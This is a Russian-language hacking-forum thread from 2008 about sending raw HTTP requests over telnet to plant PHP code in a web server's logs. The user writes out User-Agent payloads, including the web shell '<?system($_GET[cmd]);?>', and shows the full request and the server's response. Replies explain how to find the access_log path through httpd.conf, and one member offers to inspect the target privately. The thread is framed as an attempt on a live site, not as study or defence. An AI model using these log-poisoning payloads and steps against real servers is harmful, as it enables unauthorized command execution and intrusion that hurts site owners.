Телнет и заголовки

Discussion in 'Уязвимости' started by Велемир, 5 Aug 2008.

  1. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Как можно через телнет посылать заголовки ? например чтонить такое - UserAgent:<?system('ls -a');?>;
    Referrer:noob.html.На ачате не нашёл)
     
  2. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    telnet www.site.com 80

    GET /paga.php HTTP/1.1
    Host: www.site.com
    User-Agent: ie 7.0
    Referer: http://www.site.com/index.html

    как то так...
     
    1 person likes this.
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Хм....попробую.Просто если открывать соединение на 80-ый порт, то он просто виснет =_=.А когда начинаешь после этого писать какуюнить фигню, то выдаёт исходник страницы,хотя не посылаешь ничего.Это в один запрос надо чель?)
     
  4. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ладно.Решил сделать по-другому - отправить запрос на серв через хттр:

    GET / HTTP/1.1
    Accept: */*
    Accept-Language: uk
    User-Agent: <?system($_GET[cmd]);?>
    Host: www.site.com
    Connection: Close

    Ответ:

    HTTP/1.1 200 OK

    Connection: close

    Date: Tue, 05 Aug 2008 10:10:47 GMT

    Server: Microsoft-IIS/6.0

    X-Powered-By: ASP.NET

    Set-Cookie: COASTATS=4898272623692111972422731601; domain=.site.com; expires=Tue 30-Dec-2031 23:59:59 GMT; path=/

    X-AspNet-Version: 2.0.50727

    Set-Cookie: ASP.NET_SessionId=np2ywp550545fyz4yzo0hpmy; path=/; HttpOnly


    Cache-Control: private

    Content-Type: text/html; charset=utf-8

    Content-Length: 56557


    В еррор лог не записалось ничего.Может с ошибкой послать надо?).Странно,но почему-то в еррор.лог нет ни одной моей ошибки)))).Последние записи идут за декабрь прошлого года)).Есть ещё access_log,но на него почему-то нет прав,хотя под рутом.
     
    #4 Велемир, 5 Aug 2008
    Last edited: 5 Aug 2008
  5. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    хз, проверил у себя, запрос работает

     
  6. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Запрос то работает, но почему-то не логгируется нихрена.Ведь независимо от того,к какой странице или папке совершается запрос,действия должны логгироваться.Может,таких файлов два ? Дело в том,что если ошибки в запросах к бд присутствует,типа *фаил не существует* или * к папке нет доступа*, действия не логгируются в еррор_лог
     
  7. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    все эти действия пишутся в access_log...
     
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    И что ж делать тогда ?
     
  9. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    ищи httpd.conf, там смотри нужный ServerName, и смотри где находится access_log ....;)

    скинь линк в пм, я посматрю... (если хочешь ;) )
     
    #9 aka PSIH, 5 Aug 2008
    Last edited: 5 Aug 2008
  10. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    Откуда знаешь шо логируется иль нет? И есть ли у тебя путь к лог-файлам и доступ к ним ?
     
  11. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Интересно а как бы я узнал о лог файлах вообще,если бы путей не знал ? Разумеется есть).еррор лог отображает инфу об ошибках,а ассецц лог ничего,но в системе присутствует.
     
  12. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    сканер acunetix web vulnerability scanner ---> вкладка http editor тебе поможет разобраться!